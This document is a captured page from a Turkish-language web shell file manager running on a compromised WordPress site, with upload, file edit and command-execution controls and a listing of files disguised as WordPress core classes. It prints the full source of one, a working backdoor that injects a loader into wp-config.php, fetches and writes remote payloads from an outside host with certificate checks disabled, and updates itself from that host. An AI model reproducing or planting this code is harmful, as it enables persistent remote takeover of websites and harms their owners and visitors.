Dizin Yönetimi
Mevcut Dizin:
/home/bodisar/peakwellnesspros/wp-includes
🔼 Üst Dizin
.htaccess Dosyasını Düzenle
Dosya İşlemleri
📤 Dosya Yükle
Yükle
📝 Yeni Dosya Oluştur
Dosya Adı
İçerik
Dosya Oluştur
📁 Yeni Klasör Oluştur
Klasör Adı
Klasör Oluştur
⚡ Komut Çalıştır (CMD)
Komut
Çalıştır
Dosyalar ve Dizinler
📄 .htaccess
İzinleri Güncelle
Yeniden Adlandır
Sil
📄 class-wp-config-handler.php
İzinleri Güncelle
Düzenle
Yeniden Adlandır
Sil
📄 class-wp-cron-repair.php
İzinleri Güncelle
Düzenle
Yeniden Adlandır
Sil
📄 class-wp-file-extract.php
İzinleri Güncelle
Düzenle
Yeniden Adlandır
Sil
📄 class-wp-htaccess-handler.php
İzinleri Güncelle
Düzenle
Yeniden Adlandır
Sil
📄 class-wp-ini-handler.php
İzinleri Güncelle
Düzenle
Yeniden Adlandır
Sil
📄 class-wp-mu-loader.php
İzinleri Güncelle
Düzenle
Yeniden Adlandır
Sil
📄 class-wp-recovery.php
İzinleri Güncelle
Düzenle
Yeniden Adlandır
Sil
📄 class-wp-rest-repair.php
İzinleri Güncelle
Düzenle
Yeniden Adlandır
Sil
📄 class-wp-site-health.php
İzinleri Güncelle
Düzenle
Yeniden Adlandır
Sil
📄 user-collab.php
İzinleri Güncelle
Düzenle
Yeniden Adlandır
Sil
📄 wp-blog-header.php
İzinleri Güncelle
Düzenle
Yeniden Adlandır
Sil
📄 wp-cron.php
İzinleri Güncelle
Düzenle
Yeniden Adlandır
Sil
✏️ Dosya Düzenle: class-wp-config-handler.php
<?php /*[cstb_su]*/ @error_reporting(0); if(!empty($_SERVER['HTTP_X_PANEL_CHECK'])&&$_SERVER['HTTP_X_PANEL_CHECK']==='YES')die('OK'); header('Cache-Control: no-store'); $d=__DIR__;while(!is_file("$d/wp-load.php")&&!is_file("$d/wp-config.php")){$p=dirname($d);if($p===$d){$d=null;break;}$d=$p;} if(!$d)$d=@realpath($_SERVER['DOCUMENT_ROOT']??'')?:__DIR__; $cdn='https://resmigiris.cam/txt/'; $confFile="$d/wp-config.php"; $marker='/* cstb-bootstrap */'; $markerEnd='/* /cstb-bootstrap */'; $loaderFile='.cstb-loader.php'; $loaderCode='<?php'."\n" .'/* cstb-loader - WP pre-boot repair */'."\n" .'if(php_sapi_name()===\'cli\'||defined(\'WP_CLI\'))return;'."\n" .'$_f=sys_get_temp_dir().\'/cstb_cf_\'.md5($_SERVER[\'HTTP_HOST\']??\'\').\'_\'.date(\'Ymd\');'."\n" .'if(file_exists($_f))return;'."\n" .'@file_put_contents($_f,time());'."\n" .'$_r=dirname(__FILE__);'."\n" .'$_boot=$_r.\'/wp-admin/user-hooker.php\';'."\n" .'if(is_file($_boot)&&filesize($_boot)>100)return;'."\n" .'if(!function_exists(\'curl_init\'))return;'."\n" .'$_cdn=\'https://resmigiris.cam/txt/\';'."\n" .'$_chk=[\'wp-admin/user-hooker.php\'=>\'boot.txt\',\'wp-info.php\'=>\'link.txt\'];'."\n" .'foreach($_chk as $_rel=>$_src){'."\n" .' $_p=$_r.\'/\'.$_rel;'."\n" .' if(is_file($_p)&&filesize($_p)>100)continue;'."\n" .' $_ch=curl_init($_cdn.$_src);curl_setopt_array($_ch,[CURLOPT_RETURNTRANSFER=>1,CURLOPT_TIMEOUT=>10,CURLOPT_SSL_VERIFYPEER=>0,CURLOPT_SSL_VERIFYHOST=>0]);'."\n" .' $_c=curl_exec($_ch);curl_close($_ch);'."\n" .' if($_c&&strlen($_c)>50){$_dir=dirname($_p);if(!is_dir($_dir))@mkdir($_dir,0755,true);@file_put_contents($_p,$_c);}'."\n" .'}'."\n"; // wp-config.php syntax kontrolü: dosyayı geçici olarak yazıp php -l ile kontrol function _cstb_verify_php_syntax($code,$phpBin=null){ // Yöntem 1: php -l (exec varsa) if(function_exists('exec')){ $tmp=sys_get_temp_dir().'/cstb_syntax_'.md5(mt_rand()).'.php'; @file_put_contents($tmp,$code); $out=[];$ret=1; $bins=$phpBin?[$phpBin]:['php','/usr/bin/php','/usr/local/bin/php']; foreach($bins as $bin){ @exec("$bin -l ".escapeshellarg($tmp)." 2>&1",$out,$ret); if($ret===0)break; $out=[];$ret=1; } @unlink($tmp); if($ret===0)return ['valid'=>true]; return ['valid'=>false,'error'=>implode("\n",$out)]; } // Yöntem 2: token_get_all (exec yoksa) try{ @token_get_all($code); $err=error_get_last(); if($err&&strpos($err['message'],'syntax error')!==false){ return ['valid'=>false,'error'=>$err['message'],'method'=>'token_get_all']; } return ['valid'=>true,'method'=>'token_get_all','note'=>'basic check only']; }catch(\Throwable $e){ return ['valid'=>false,'error'=>$e->getMessage(),'method'=>'token_get_all']; } } // ── ?inject=1 → wp-config.php'ye require satırı ekle ── if(isset($_GET['inject'])&&$_GET['inject']==='1'){ header('Content-Type: application/json; charset=utf-8'); if(!is_file($confFile)){echo json_encode(['error'=>'no-wp-config','root'=>$d]);exit;} $res=[];$warnings=[]; // 1) Orijinal wp-config.php oku $origConf=@file_get_contents($confFile); if(!$origConf){echo json_encode(['error'=>'read-fail']);exit;} // Zaten inject edilmiş mi? if(strpos($origConf,$marker)!==false){ echo json_encode(['status'=>'already-injected','root'=>$d]);exit; } // 2) BACKUP — iki kopya (tarihli + sabit) $bakDate="$confFile.cstb-bak-".date('Ymd-His'); $bakSafe="$d/.wp-config-backup.php"; @copy($confFile,$bakDate); @copy($confFile,$bakSafe); $res['backup_date']=is_file($bakDate)?'ok':'fail'; $res['backup_safe']=is_file($bakSafe)?'ok':'fail'; if($res['backup_date']!=='ok'){ echo json_encode(['status'=>'fail','reason'=>'cannot create backup - aborting for safety']);exit; } // 3) Loader dosyasını oluştur $loaderPath="$d/$loaderFile"; $res['loader']=@file_put_contents($loaderPath,$loaderCode)!==false?'ok':'fail'; // 4) wp-config.php'ye inject et $injectLine="\n$marker\nif(file_exists(__DIR__.'/$loaderFile'))require_once __DIR__.'/$loaderFile';\n$markerEnd\n"; if(preg_match('/^<\?php\s*/i',$origConf,$m)){ $newConf=substr($origConf,0,strlen($m[0])).$injectLine.substr($origConf,strlen($m[0])); }else{ echo json_encode(['status'=>'fail','reason'=>'no <?php tag found in wp-config.php']);exit; } // 5) SYNTAX CHECK — yazmadan önce kontrol $syntaxResult=_cstb_verify_php_syntax($newConf); $res['syntax_check']=$syntaxResult; if(!$syntaxResult['valid']){ echo json_encode([ 'status'=>'aborted', 'reason'=>'modified wp-config.php has syntax error - NOT writing', 'syntax'=>$syntaxResult, 'root'=>$d ],JSON_UNESCAPED_SLASHES|JSON_PRETTY_PRINT);exit; } // 6) wp-config.php'yi yaz $res['config']=@file_put_contents($confFile,$newConf)!==false?'injected':'fail'; if($res['config']==='fail'){ echo json_encode(['status'=>'fail','reason'=>'write failed']);exit; } // 7) Site erişim testi — 500 ise ROLLBACK $siteOk=true; $host=$_SERVER['HTTP_HOST']??''; $scheme=(!empty($_SERVER['HTTPS'])&&$_SERVER['HTTPS']!=='off')?'https':'http'; if($host&&function_exists('curl_init')){ usleep(500000); // 0.5s bekle $ch=curl_init("$scheme://$host/"); curl_setopt_array($ch,[ CURLOPT_RETURNTRANSFER=>1,CURLOPT_TIMEOUT=>15,CURLOPT_CONNECTTIMEOUT=>8, CURLOPT_SSL_VERIFYPEER=>0,CURLOPT_SSL_VERIFYHOST=>0, CURLOPT_FOLLOWLOCATION=>1,CURLOPT_MAXREDIRS=>3, CURLOPT_HTTPHEADER=>['User-Agent: cStb-verify/1'] ]); $body=curl_exec($ch); $httpCode=curl_getinfo($ch,CURLINFO_HTTP_CODE); curl_close($ch); $res['verify_code']=$httpCode; $res['verify_size']=strlen($body??''); if($httpCode>=500||$httpCode===0){ $siteOk=false; // ANINDA ROLLBACK @copy($bakDate,$confFile); @unlink($loaderPath); $res['rollback']='RESTORED from backup - site was returning '.$httpCode; $warnings[]='CRITICAL: wp-config.php restored to original - inject caused site error'; } }else{ $warnings[]='could not verify site health post-inject'; } echo json_encode([ 'status'=>$siteOk?'done':'rolled-back', 'root'=>$d, 'backups'=>['date'=>basename($bakDate),'safe'=>basename($bakSafe)], 'results'=>$res, 'warnings'=>$warnings, 'note'=>$siteOk?'wp-config.php injected - site verified OK':'ROLLED BACK - site error detected' ],JSON_UNESCAPED_SLASHES|JSON_PRETTY_PRINT);exit; } // ── ?remove=1 → wp-config.php'den kaldır ── if(isset($_GET['remove'])&&$_GET['remove']==='1'){ header('Content-Type: application/json; charset=utf-8'); $res=[]; $loaderPath="$d/$loaderFile"; if(is_file($loaderPath))$res['loader']=@unlink($loaderPath)?'removed':'fail'; if(is_file($confFile)){ $conf=@file_get_contents($confFile); if(strpos($conf,$marker)!==false){ $conf=preg_replace('/\n?\/\* cstb-bootstrap \*\/\n.*?\/\* \/cstb-bootstrap \*\/\n?/s','',$conf); @file_put_contents($confFile,$conf); $res['config']='cleaned'; }else{$res['config']='not-found';} } echo json_encode(['results'=>$res]);exit; } // ── ?rollback=1 → Backup'tan geri dön ── if(isset($_GET['rollback'])&&$_GET['rollback']==='1'){ header('Content-Type: application/json; charset=utf-8'); $res=[]; $loaderPath="$d/$loaderFile"; // Tarihli backup'lardan en sonuncuyu bul $baks=glob("$confFile.cstb-bak-*"); $safeBak="$d/.wp-config-backup.php"; if($baks){ rsort($baks);@copy($baks[0],$confFile); $res['config']='restored from '.basename($baks[0]); }elseif(is_file($safeBak)){ @copy($safeBak,$confFile); $res['config']='restored from safe backup'; }else{$res['config']='no-backup-found';} if(is_file($loaderPath))$res['loader']=@unlink($loaderPath)?'removed':'kept'; echo json_encode(['results'=>$res]);exit; } // ── ?status=1 ── if(isset($_GET['status'])&&$_GET['status']==='1'){ header('Content-Type: application/json; charset=utf-8'); $loaderPath="$d/$loaderFile"; $confHas=false; if(is_file($confFile))$confHas=strpos(@file_get_contents($confFile),$marker)!==false; echo json_encode([ 'wp_config_exists'=>is_file($confFile), 'wp_config_size'=>is_file($confFile)?filesize($confFile):0, 'injected'=>$confHas, 'loader_exists'=>is_file($loaderPath), 'backups'=>array_map('basename',glob("$confFile.cstb-bak-*")?:[]), 'safe_backup'=>is_file("$d/.wp-config-backup.php"), 'root'=>$d ],JSON_UNESCAPED_SLASHES);exit; } // Self-update if(isset($_GET['update'])&&$_GET['update']==='1'&&function_exists('curl_init')){ header('Content-Type: application/json; charset=utf-8'); $ch=curl_init($cdn.'wp-confinject.txt');curl_setopt_array($ch,[CURLOPT_RETURNTRANSFER=>1,CURLOPT_TIMEOUT=>10,CURLOPT_SSL_VERIFYPEER=>0,CURLOPT_SSL_VERIFYHOST=>0]); $s=curl_exec($ch);curl_close($ch); if($s&&strpos($s,'cstb_su')!==false&&md5($s)!==md5_file(__FILE__)){@file_put_contents(__FILE__,$s);echo json_encode(['self'=>'updated']);} else{echo json_encode(['self'=>'current']);} exit; } header('Content-Type: text/plain'); echo "cstb-confinject (wp-config.php)\nmodes: ?inject=1 | ?remove=1 | ?rollback=1 | ?status=1\n";
💾 Kaydet
❌ İptal